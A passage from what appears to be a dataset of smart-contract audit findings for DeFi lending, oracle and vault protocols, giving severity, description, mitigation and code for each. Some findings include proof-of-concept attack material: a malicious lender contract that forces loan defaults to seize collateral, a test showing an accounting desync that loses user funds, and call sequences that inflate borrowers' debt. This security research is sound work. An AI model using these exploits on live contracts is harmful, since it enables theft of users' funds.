interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n\\nHowever, this function doesn't provide any protection. The lender can bypass this check without implementing the `CoolerCallback` abstract by calling the `Cooler.clearRequest()` function using a contract that implements the `isCoolerCallback()` function and returns a `true` value.\\nFor example:\\n```\\ncontract maliciousLender {\\n function isCoolerCallback() pure returns(bool) {\\n return true;\\n }\\n \\n function operation(\\n address _to,\\n uint256 reqID_\\n ) public {\\n Cooler(_to).clearRequest(reqID_, true, true);\\n }\\n \\n function onDefault(uint256 loanID_, uint256 debt, uint256 collateral) public {}\\n}\\n```\\n\\nBy being the `loan.lender` with implement only `onDefault()` function, this will cause the `repayLoan()` and `rollLoan()` methods to fail due to revert at `onRepay()` and `onRoll()` function. The borrower cannot repay and the loan will be defaulted.\\nAfter the loan default, the attacker can execute `claimDefault()` to claim the collateral.\\nFurthermore, there is another method that allows lenders to bypass the `CoolerCallback.isCoolerCallback()` function which is loan ownership transfer.\\n```\\n/// @notice Approve transfer of loan ownership rights to a new address.\\n/// @param to_ address to be approved.\\n/// @param loanID_ index of loan in loans[].\\nfunction approveTransfer(address to_, uint256 loanID_) external {\\n if (msg.sender != loans[loanID_].lender) revert OnlyApproved();\\n\\n // Update transfer approvals.\\n approvals[loanID_] = to_;\\n}\\n\\n/// @notice Execute loan ownership transfer. Must be previously approved by the lender.\\n/// @param loanID_ index of loan in loans[].\\nfunction transferOwnership(uint256 loanID_) external {\\n if (msg.sender != approvals[loanID_]) revert OnlyApproved();\\n\\n // Update the load lender.\\n loans[loanID_].lender = msg.sender;\\n // Clear transfer approvals.\\n approvals[loanID_] = address(0);\\n}\\n```\\n\\nNormally, the lender who implements the `CoolerCallback` abstract may call the `Cooler.clearRequest()` with the `_isCoolerCallback` parameter set to `true` to execute logic when a loan is repaid, rolled, or defaulted.\\nBut the lender needs to change the owner of the loan, so they call the `approveTransfer()` and `transferOwnership()` functions to the contract that doesn't implement the `CoolerCallback` abstract (or implement only `onDefault()` function to force the loan default), but the `loan.callback` flag is still set to `true`.\\nThus, this breaks the business logic since the three callback functions don't need to be implemented when the `isCoolerCallback()` is set to `true` according to the dev note in the `CoolerCallback` abstract below:\\n/// @notice Allows for debt issuers to execute logic when a loan is repaid, rolled, or defaulted. /// @dev The three callback functions must be implemented if `isCoolerCallback()` is set to true.чOnly allowing callbacks from the protocol-trusted address (eg., `Clearinghouse` contract).\\nDisable the transfer owner of the loan when the `loan.callback` is set to `true`.чThe lender forced the Loan become default to get the collateral token, owner lost the collateral token.\\nBypass the `isCoolerCallback` validation.ч```\\nfunction clearRequest(\\n uint256 reqID_,\\n bool repayDirect_,\\n bool isCallback_\\n) external returns (uint256 loanID) {\\n Request memory req = requests[reqID_];\\n\\n // If necessary, ensure lender implements the CoolerCallback abstract.\\n if (isCallback_ && !CoolerCallback(msg.sender).isCoolerCallback()) revert NotCoolerCallback();\\n\\n // Ensure loan request is active. \\n if (!req.active) revert Deactivated();\\n\\n // Clear the loan request in memory.\\n req.active = false;\\n\\n // Calculate and store loan terms.\\n uint256 interest = interestFor(req.amount, req.interest, req.duration);\\n uint256 collat = collateralFor(req.amount, req.loanToCollateral);\\n uint256 expiration = block.timestamp + req.duration;\\n loanID = loans.length;\\n loans.push(\\n Loan({\\n request: req,\\n amount: req.amount + interest,\\n unclaimed: 0,\\n collateral: collat,\\n expiry: expiration,\\n lender: msg.sender,\\n repayDirect: repayDirect_,\\n callback: isCallback_\\n })\\n );\\n\\n // Clear the loan request storage.\\n requests[reqID_].active = false;\\n\\n // Transfer debt tokens to the owner of the request.\\n debt().safeTransferFrom(msg.sender, owner(), req.amount);\\n\\n // Log the event.\\n factory().newEvent(reqID_, CoolerFactory.Events.ClearRequest, 0);\\n}\\n```\\n -`emergency_shutdown` role is not enough for emergency shutdown.чmediumчLet's examine the function emergencyShutdown():\\n```\\nfunction emergencyShutdown() external onlyRole(\"emergency_shutdown\") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 sdaiBalance = sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n\\nThis has the modifier `onlyRole(\"emergency_shutdown\")`. However, this also calls function `defund()`, which has the modifier `onlyRole(\"cooler_overseer\")`\\n```\\nfunction defund(ERC20 token_, uint256 amount_) public onlyRole(\"cooler_overseer\") {\\n```\\n\\nTherefore, the role `emergency_shutdown` will not have the ability to shutdown the protocol, unless it also has the overseer role.\\nTo get a coded PoC, make the following modifications to the test case:\\n```\\n//rolesAdmin.grantRole(\"cooler_overseer\", overseer);\\nrolesAdmin.grantRole(\"emergency_shutdown\", overseer);\\n```\\n\\nRun the following test command (to just run a single test test_emergencyShutdown()):\\n```\\nforge test --match-test test_emergencyShutdown\\n```\\n\\nThe test will fail with the `ROLES_RequireRole()` error.чThere are two ways to mitigate this issue:\\nSeparate the logic for emergency shutdown and defunding. i.e. do not defund when emergency shutdown, but rather defund separately after shutdown.\\nMove the defunding logic to a separate internal function, so that emergency shutdown function can directly call defunding without going through a modifier.ч`emergency_shutdown` role cannot emergency shutdown the protocolч```\\nfunction emergencyShutdown() external onlyRole(\"emergency_shutdown\") {\\n active = false;\\n\\n // If necessary, defund sDAI.\\n uint256 sdaiBalance = sdai.balanceOf(address(this));\\n if (sdaiBalance != 0) defund(sdai, sdaiBalance);\\n\\n // If necessary, defund DAI.\\n uint256 daiBalance = dai.balanceOf(address(this));\\n if (daiBalance != 0) defund(dai, daiBalance);\\n\\n emit Deactivated();\\n}\\n```\\n -Lender is able to steal borrowers collateral by calling rollLoan with unfavourable terms on behalf of the borrower.чmediumчSay a user has 100 collateral tokens valued at $1,500 and they wish to borrow 1,000 debt tokens valued at $1,000 they would would call: (values have simplified for ease of math)\\n```\\nrequestLoan(\"1,000 debt tokens\", \"5% interest\", \"10 loan tokens for each collateral\", \"1 year\")\\n```\\n\\nIf a lender then clears the request the borrower would expect to have 1 year to payback 1,050 debt tokens to be able to receive their collateral back.\\nHowever a lender is able to call provideNewTermsForRoll with whatever terms they wish: i.e.\\n```\\nprovideNewTermsForRoll(\"loanID\", \"10000000% interest\", \"1000 loan tokens for each collateral\" , \"1 year\")\\n```\\n\\nThey can then follow this up with a call to rollLoan(loanID): During the rollLoan function the interest is recalculated using:\\n```\\n function interestFor(uint256 amount_, uint256 rate_, uint256 duration_) public pure returns (uint256) {\\n uint256 interest = (rate_ * duration_) / 365 days;\\n return (amount_ * interest) / DECIMALS_INTEREST;\\n }\\n```\\n\\nAs rate_ & duration_ are controllable by the borrower when they call provideNewTermsForRoll they can input a large number that the amount returned is much larger then the value of the collateral. i.e. input a rate_ of amount * 3 and duration of 365 days so that the interestFor returns 3,000.\\nThis amount gets added to the existing loan.amount and would make it too costly to ever repay as the borrower would have to spend more then the collateral is worth to get it back. i.e. borrower now would now need to send 4,050 debt tokens to receive their $1,500 worth of collateral back instead of the expected 1050.\\nThe extra amount should result in more collateral needing to be sent however it is calculated using loan.request.loanToCollateral which is also controlled by the lender when they call provideNewTermsForRoll, allowing them to input a value that will result in newCollateralFor returning 0 and no new collateral needing to be sent.\\n```\\n function newCollateralFor(uint256 loanID_) public view returns (uint256) {\\n Loan memory loan = loans[loanID_];\\n // Accounts for all outstanding debt (borrowed amount + interest).\\n uint256 neededCollateral = collateralFor(loan.amount, loan.request.loanToCollateral); \\n // Lender can force neededCollateral to always be less than loan.collateral\\n\\n return neededCollateral > loan.collateral ? neededCollateral - loan.collateral : 0;\\n }\\n```\\n\\nAs a result a borrower who was expecting to have repay 1050 tokens to get back their collateral may now need to spend many multiples more of that and will just be forced to just forfeit their collateral to the lender.чAdd a check restricting rollLoan to only be callable by the owner. i.e.:\\n```\\nfunction rollLoan(uint256 loanID_) external {\\n Loan memory loan = loans[loanID_];\\n \\n if (msg.sender != owner()) revert OnlyApproved();\\n```\\n\\nNote: unrelated but rollLoan is also missing its event should add:\\n```\\nfactory().newEvent(reqID_, CoolerFactory.Events.RollLoan, 0);\\n```\\nчBorrower will be forced to payback the loan at unfavourable terms or forfeit their collateral.ч```\\nrequestLoan(\"1,000 debt tokens\", \"5% interest\", \"10 loan tokens for each collateral\", \"1 year\")\\n```\\n -Stable BPT valuation is incorrect and can be exploited to cause protocol insolvencyчhighчStableBPTOracle.sol#L48-L53\\n```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? price : minPrice;\\n }\\n return minPrice.mulWadDown(pool.getRate());\\n```\\n\\nThe above block is used to calculate the price. Finding the min price of all assets in the pool then multiplying by the current rate of the pool. This is nearly identical to how stable curve LP is priced. Balancer pools are a bit different and this methodology is incorrect for them. Lets look at a current mainnet pool to see the problem. Take the wstETH/aETHc pool. Currently getRate() = 1.006. The lowest price is aETHc at 2,073.23. This values the LP at 2,085.66. The issue is that the LPs actual value is 1,870.67 (nearly 12% overvalued) which can be checked here.\\nOvervaluing the LP as such can cause protocol insolvency as the borrower can overborrow against the LP, leaving the protocol with bad debt.чStable BPT oracles need to use a new pricing methodologyчProtocol insolvency due to overborrowingч```\\n uint256 minPrice = base.getPrice(tokens[0]);\\n for(uint256 i = 1; i != length; ++i) {\\n uint256 price = base.getPrice(tokens[i]);\\n minPrice = (price < minPrice) ? price : minPrice;\\n }\\n return minPrice.mulWadDown(pool.getRate());\\n```\\n -CurveTricryptoOracle#getPrice contains math error that causes LP to be priced completely wrongчhighчCurveTricryptoOracle.sol#L57-L62\\n```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n\\nAfter the LP price has been calculated in USD it is mistakenly divided by the price of ETH causing the contract to return the LP price in terms of ETH rather than USD. This leads to LP that is massively undervalued causing positions which are actually heavily over collateralized to be liquidated.чDon't divide the price by the price of ETHчHealthy positions are liquidated due to incorrect LP pricingч```\\n (lpPrice(\\n virtualPrice,\\n base.getPrice(tokens[1]),\\n ethPrice,\\n base.getPrice(tokens[0])\\n ) * 1e18) / ethPrice;\\n```\\n -CVX/AURA distribution calculation is incorrect and will lead to loss of rewards at the end of each cliffчhighчWAuraPools.sol#L233-L248\\n```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n\\nThe above code is used to calculate the amount of AURA owed to the user. This calculation is perfectly accurate if the AURA hasn't been minted yet. The problem is that each time a user withdraws, AURA is claimed for ALL vault participants. This means that the rewards will be realized for a majority of users before they themselves withdraw. Since the emissions decrease with each cliff, there will be loss of funds at the end of each cliff.\\nExample: Assume for simplicity there are only 2 cliffs. User A deposits LP to WAuraPools. After some time User B deposits as well. Before the end of the first cliff User A withdraw. This claims all tokens owed to both users A and B which is now sitting in the contract. Assume both users are owed 10 tokens. Now User B waits for the second cliff to end before withdrawing. When calculating his rewards it will give him no rewards since all cliffs have ended. The issue is that the 10 tokens they are owed is already sitting in the contract waiting to be claimed.чI would recommend a hybrid approach. When rewards are claimed upon withdrawal, the reward per token should be cached to prevent loss of tokens that have already been received by the contract. Only unminted AURA should be handled this way.чAll users will lose rewards at the end of each cliff due to miscalculationч```\\n if (cliff < totalCliffs) {\\n /// e.g. (new) reduction = (500 - 100) * 2.5 + 700 = 1700;\\n /// e.g. (new) reduction = (500 - 250) * 2.5 + 700 = 1325;\\n /// e.g. (new) reduction = (500 - 400) * 2.5 + 700 = 950;\\n uint256 reduction = ((totalCliffs - cliff) * 5) / 2 + 700;\\n /// e.g. (new) amount = 1e19 * 1700 / 500 = 34e18;\\n /// e.g. (new) amount = 1e19 * 1325 / 500 = 26.5e18;\\n /// e.g. (new) amount = 1e19 * 950 / 500 = 19e17;\\n mintAmount = (mintRequestAmount * reduction) / totalCliffs;\\n\\n /// e.g. amtTillMax = 5e25 - 1e25 = 4e25\\n uint256 amtTillMax = emissionMaxSupply - emissionsMinted;\\n if (mintAmount > amtTillMax) {\\n mintAmount = amtTillMax;\\n }\\n }\\n```\\n -Invalid oracle versions can cause desync of global and local positions making protocol lose funds and being unable to pay back all usersчhighчIn more details, if there are 2 pending positions with timestamps different by 2 oracle versions and the first of them has invalid oracle version at its timestamp, then there are 2 different position flows possible depending on the time when the position is settled (update transaction called):\\nFor earlier update the flow is: previous position (oracle v1) -> position 1 (oracle v2) -> position 2 (oracle v3)\\nFor later update position 1 is skipped completely (the fees for the position are also not taken) and the flow is: previous position (oracle v1) -> invalidated position 1 (in the other words: previous position again) (oracle v2) -> position 2 (oracle v3)\\nWhile the end result (position 2) is the same, it's possible that pending global position is updated earlier (goes the 1st path), while the local position is updated later (goes the 2nd path). For a short time (between oracle versions 2 and 3), the global position will accumulate everything (including profit and loss) using the pending position 1 long/short/maker values, but local position will accumulate everything using the previous position with different values.\\nConsider the following scenario: Oracle uses granularity = 100. Initially user B opens position maker = 2 with collateral = 100. T=99: User A opens long = 1 with collateral = 100 (pending position long=1 timestamp=100) T=100: Oracle fails to commit this version, thus it becomes invalid T=201: At this point oracle version at timestamp 200 is not yet commited, but the new positions are added with the next timestamp = 300: User A closes his long position (update(0,0,0,0)) (pending position: long=1 timestamp=100; long=0 timestamp=300) At this point, current global long position is still 0 (pending the same as user A local pending positions)\\nT=215: Oracle commits version with timestamp = 200, price = $100 T=220: User B settles (update(2,0,0,0) - keeping the same position). At this point the latest oracle version is the one at timestamp = 200, so this update triggers update of global pending positions, and current latest global position is now long = 1.0 at timestamp = 200. T=315: Oracle commits version with timestamp = 300, price = $90 after settlement of both UserA and UserB, we have the following:\\nGlobal position settlement. It accumulates position [maker = 2.0, long = 1.0] from timestamp = 200 (price=$100) to timestamp = 300 (price=$90). In particular: longPnl = 1*($90-$100) = -$10 makerPnl = -longPnl = +$10\\nUser B local position settlement. It accumulates position [maker = 2.0] from timestamp = 200 to timestamp = 300, adding makerPnl ($10) to user B collateral. So user B collateral = $110\\nUser A local position settlement. When accumulating, pending position 1 (long = 1, timestamp = 100) is invalidated to previous position (long = 0) and also fees are set to 0 by invalidation. So user A local accumulates position [long = 0] from timestamp = 0 to timestamp = 300 (next pending position), this doesn't change collateral at all (remains $100). Then the next pending position [long = 0] becomes the latest position (basically position of long=1 was completely ignored as if it has not existed).\\nResult: User A deposited $100, User B deposited $100 (total $200 deposited) after the scenario above: User A has collateral $110, User B has collateral $100 (total $210 collateral withdrawable) However, protocol only has $200 deposited. This means that the last user will be unable to withdraw the last $10 since protocol doesn't have it, leading to a user loss of funds.\\nThe scenario above is demonstrated in the test, add this to test/unit/market/Market.test.ts:\\n```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral deposit maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral deposit long: \" + info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral long: \" + info.collateral);\\n})\\n```\\n\\nConsole output for the code:\\n```\\ncollateral deposit maker: 100000000\\ncollateral deposit long: 100000000\\ncollateral maker: 110000028\\ncollateral long: 100000000\\n```\\n\\nMaker has a bit more than $110 in the end, because he also earns funding and interest during the short time when ephemeral long position is active (but user A doesn't pay these fees).чThe issue is that positions with invalid oracle versions are ignored until the first valid oracle version, however the first valid version can be different for global and local positions. One of the solutions I see is to introduce a map of position timestamp -> oracle version to settle, which will be filled by global position processing. Local position processing will follow the same path as global using this map, which should eliminate possibility of different paths for global and local positions.\\nIt might seem that the issue can only happen with exactly 1 oracle version between invalid and valid positions. However, it's also possible that some non-requested oracle versions are commited (at some random timestamps between normal oracle versions) and global position will go via the route like t100[pos0]->t125[pos1]->t144[pos1]->t200[pos2] while local one will go t100[pos0]->t200[pos2] OR it can also go straight to t300 instead of t200 etc. So the exact route can be anything, and local oracle will have to follow it, that's why I suggest a path map.\\nThere might be some other solutions possible.чAny time the oracle skips a version (invalid version), it's likely that global and local positions for different users who try to trade during this time will desync, leading to messed up accounting and loss of funds for users or protocol, potentially triggering a bank run with the last user being unable to withdraw all funds.\\nThe severity of this issue is high, because while invalid versions are normally a rare event, however in the current state of the codebase there is a bug that pyth oracle requests are done using this block timestamp instead of granulated future time (as positions do), which leads to invalid oracle versions almost for all updates (that bug is reported separately). Due to this other bug, the situation described in this issue will arise very often by itself in a normal flow of the user requests, so it's almost 100% that internal accounting for any semi-active market will be broken and total user collateral will deviate away from real deposited funds, meaning the user funds loss.\\nBut even with that other bug fixed, the invalid oracle version is a normal protocol event and even 1 such event might be enough to break internal market accounting.ч```\\nit('panprog global-local desync', async () => {\\n const positionMaker = parse6decimal('2.000')\\n const positionLong = parse6decimal('1.000')\\n const collateral = parse6decimal('100')\\n\\n const oracleVersion = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion.timestamp).returns(oracleVersion)\\n oracle.status.returns([oracleVersion, oracleVersion.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(userB.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, collateral, false)\\n\\n const oracleVersion2 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 100,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion2.timestamp).returns(oracleVersion2)\\n oracle.status.returns([oracleVersion2, oracleVersion2.timestamp + 100])\\n oracle.request.returns()\\n\\n dsu.transferFrom.whenCalledWith(user.address, market.address, collateral.mul(1e12)).returns(true)\\n await market.connect(user).update(user.address, 0, positionLong, 0, collateral, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral deposit maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral deposit long: \" + info.collateral);\\n\\n // invalid oracle version\\n const oracleVersion3 = {\\n price: 0,\\n timestamp: TIMESTAMP + 200,\\n valid: false,\\n }\\n oracle.at.whenCalledWith(oracleVersion3.timestamp).returns(oracleVersion3)\\n\\n // next oracle version is valid\\n const oracleVersion4 = {\\n price: parse6decimal('100'),\\n timestamp: TIMESTAMP + 300,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion4.timestamp).returns(oracleVersion4)\\n\\n // still returns oracleVersion2, because nothing commited for version 3, and version 4 time has passed but not yet commited\\n oracle.status.returns([oracleVersion2, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // reset to 0\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n // oracleVersion4 commited\\n oracle.status.returns([oracleVersion4, oracleVersion4.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n\\n const oracleVersion5 = {\\n price: parse6decimal('90'),\\n timestamp: TIMESTAMP + 400,\\n valid: true,\\n }\\n oracle.at.whenCalledWith(oracleVersion5.timestamp).returns(oracleVersion5)\\n oracle.status.returns([oracleVersion5, oracleVersion5.timestamp + 100])\\n oracle.request.returns()\\n\\n // settle\\n await market.connect(userB).update(userB.address, positionMaker, 0, 0, 0, false)\\n await market.connect(user).update(user.address, 0, 0, 0, 0, false)\\n\\n var info = await market.locals(userB.address);\\n console.log(\"collateral maker: \" + info.collateral);\\n var info = await market.locals(user.address);\\n console.log(\"collateral long: \" + info.collateral);\\n})\\n```\\n -Protocol fee from Market.sol is lockedчhighчHere is `MarketFactory#fund` function:\\n```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n\\nThis is `Market#claimFee` function:\\n```\\n function claimFee() external {\\n Global memory newGlobal = _global.read();\\n\\n if (_claimFee(address(factory()), newGlobal.protocolFee)) newGlobal.protocolFee = UFixed6Lib.ZERO;\\n // rest of code\\n }\\n```\\n\\nThis is the internal `_claimFee` function:\\n```\\n function _claimFee(address receiver, UFixed6 fee) private returns (bool) {\\n if (msg.sender != receiver) return false;\\n\\n token.push(receiver, UFixed18Lib.from(fee));\\n emit FeeClaimed(receiver, fee);\\n return true;\\n }\\n```\\n\\nAs we can see, when `MarketFactory#fund` is called, Market#claimFee gets called which will send the protocolFee to msg.sender(MarketFacttory). When you check through the MarketFactory contract, there is no place where another address(such as protocol multisig, treasury or an EOA) is approved to spend MarketFactory's funds, and also, there is no function in the contract that can be used to transfer MarketFactory's funds. This causes locking of the protocol fees.чConsider adding a `withdraw` function that protocol can use to get the protocolFee out of the contract. You can have the `withdraw` function transfer the MarketFactory balance to the treasury or something.чProtocol fees cannot be withdrawnч```\\n function fund(IMarket market) external {\\n if (!instances(IInstance(address(market)))) revert FactoryNotInstanceError();\\n market.claimFee();\\n }\\n```\\n -PythOracle:if price.expo is less than 0, wrong prices will be recordedчhighчHere is PythOracle#_recordPrice function:\\n```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n\\nIf price is 5e-5 for example, it will be recorded as 5e5 If price is 5e-6, it will be recorded as 5e6.\\nAs we can see, there is a massive deviation in recorded price from actual price whenever price's exponent is negativeчIn PythOracle.sol, `_prices` mapping should not be `mapping(uint256 => Fixed6) private _prices;` Instead, it should be `mapping(uint256 => Price) private _prices;`, where Price is a struct that stores the price and expo:\\n```\\nstruct Price{\\n Fixed6 price,\\n int256 expo\\n}\\n```\\n\\nThis way, the price exponents will be preserved, and can be used to scale the prices correctly wherever it is used.чWrong prices will be recorded. For example, If priceA is 5e-5, and priceB is 5e-6. But due to the wrong conversion,\\nThere is a massive change in price(5e5 against 5e-5)\\nwe know that priceA is ten times larger than priceB, but priceA will be recorded as ten times smaller than priceB. Unfortunately, current payoff functions may not be able to take care of these discrepanciesч```\\n function _recordPrice(uint256 oracleVersion, PythStructs.Price memory price) private {\\n _prices[oracleVersion] = Fixed6Lib.from(price.price).mul(\\n Fixed6Lib.from(SafeCast.toInt256(10 ** SafeCast.toUint256(price.expo > 0 ? price.expo : -price.expo)))\\n );\\n _publishTimes[oracleVersion] = price.publishTime;\\n }\\n```\\n -Vault.sol: `settle`ing the 0 address will disrupt accountingчhighчWithin `Vault#_loadContext` function, the context.global is the account of the 0 address, while context.local is the account of the address to be updated or settled:\\n```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n\\nIf a user settles the 0 address, the global account will be updated with wrong data.\\nHere is the _settle logic:\\n```\\nfunction _settle(Context memory context) private {\\n // settle global positions\\n while (\\n context.global.current > context.global.latest &&\\n _mappings[context.global.latest + 1].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.global.latest + 1;\\n context.latestCheckpoint = _checkpoints[newLatestId].read();\\n (Fixed6 collateralAtId, UFixed6 feeAtId, UFixed6 keeperAtId) = _collateralAtId(context, newLatestId);\\n context.latestCheckpoint.complete(collateralAtId, feeAtId, keeperAtId);\\n context.global.processGlobal(\\n newLatestId,\\n context.latestCheckpoint,\\n context.latestCheckpoint.deposit,\\n context.latestCheckpoint.redemption\\n );\\n _checkpoints[newLatestId].store(context.latestCheckpoint);\\n }\\n\\n // settle local position\\n if (\\n context.local.current > context.local.latest &&\\n _mappings[context.local.current].read().ready(context.latestIds)\\n ) {\\n uint256 newLatestId = context.local.current;\\n Checkpoint memory checkpoint = _checkpoints[newLatestId].read();\\n context.local.processLocal(\\n newLatestId,\\n checkpoint,\\n context.local.deposit,\\n context.local.redemption\\n );\\n }\\n}\\n```\\n\\nIf settle is called on 0 address, _loadContext will give context.global and context.local same data. In the _settle logic, after the global account(0 address) is updated with the correct data in the `while` loop(specifically through the processGlobal function), the global account gets reupdated with wrong data within the `if` statement through the processLocal function.\\nWrong assets and shares will be recorded. The global account's assets and shares should be calculated with toAssetsGlobal and toSharesGlobal respectively, but now, they are calculated with toAssetsLocal and toSharesLocal.\\ntoAssetsGlobal subtracts the globalKeeperFees from the global deposited assets, while toAssetsLocal subtracts globalKeeperFees/Checkpoint.count fees from the local account's assets.\\nSo in the case of settling the 0 address, where global account and local account are both 0 address, within the while loop of _settle function, depositedAssets-globalKeeperFees is recorded for address(0), but then, in the `if` statement, depositedAssets-(globalAssets/Checkpoint.count) is recorded for address(0)\\nAnd within the `Vault#_saveContext` function, context.global is saved before context.local, so in this case, context.global(which is 0 address with correct data) is overridden with context.local(which is 0 address with wrong data).чI believe that the ability to settle the 0 address is intended, so an easy fix is to save local context before saving global context: Before:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[address(0)].store(context.global);\\n _accounts[account].store(context.local);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\n\\nAfter:\\n```\\n function _saveContext(Context memory context, address account) private {\\n _accounts[account].store(context.local);\\n _accounts[address(0)].store(context.global);\\n _checkpoints[context.currentId].store(context.currentCheckpoint);\\n }\\n```\\nчThe global account will be updated with wrong data, that is, global assets and shares will be higher than it should be because lower keeper fees was deducted.ч```\\nfunction _loadContext(address account) private view returns (Context memory context) {\\n // rest of code\\n context.global = _accounts[address(0)].read();\\n context.local = _accounts[account].read();\\n context.latestCheckpoint = _checkpoints[context.global.latest].read();\\n}\\n```\\n -During oracle provider switch, if it is impossible to commit the last request of previous provider, then the oracle will get stuck (no price updates) without any possibility to fix itчmediumчThe way oracle provider switch works is the following:\\n`Oracle.update()` is called to set a new provider. This is only allowed if there is no other provider switch 